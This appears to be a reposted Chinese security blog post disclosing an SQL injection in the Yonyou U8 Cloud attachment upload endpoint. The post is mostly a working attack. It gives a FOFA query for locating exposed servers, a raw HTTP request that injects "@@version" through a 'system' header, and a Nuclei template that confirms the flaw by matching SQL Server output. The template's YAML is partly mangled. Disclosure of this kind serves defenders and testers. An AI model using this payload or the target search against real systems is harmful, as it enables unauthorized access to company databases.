0x00 阅读须知
免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。
0x01 漏洞简介
用友U8 Cloud是由用友公司开发和提供的一款云端企业管理软件。它是基于云计算和大数据技术的全面企业管理解决方案,旨在帮助企业实现数字化转型和业务优化。该系统/attachment/upload接口存在SQL注入漏洞。
0x02 漏洞详情
fofa:app="用友-U8-Cloud"
Poc:
GET /u8cloud/api/hr/attachment/upload?mssql_error HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
system: -1' or 1=@@version--+
0x03 Nuclie
id: yongyou_u8_cloud-attachment_upload-sqli
info:
name: yongyou_u8_cloud-attachment_upload-sqli
author: unknow
severity: high
description: 用友U8 Cloud /attachment/upload SQL注入漏洞
tags: yongyou,sqli
metadata:
:
http:
raw:
|
GET /u8cloud/api/hr/attachment/upload?mssql_error HTTP/1.1
Host:
Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 :
utf-8 :
gzip, deflate :
Connection: close
system: -1' or 1=@@version--+
matchers:
type: dsl
name: sqli
dsl:
(status_code==200 ) && contains(body, "Microsoft SQL Server")
原文始发于微信公众号(贫僧法号云空):用友U8 Cloud /attachment/upload SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论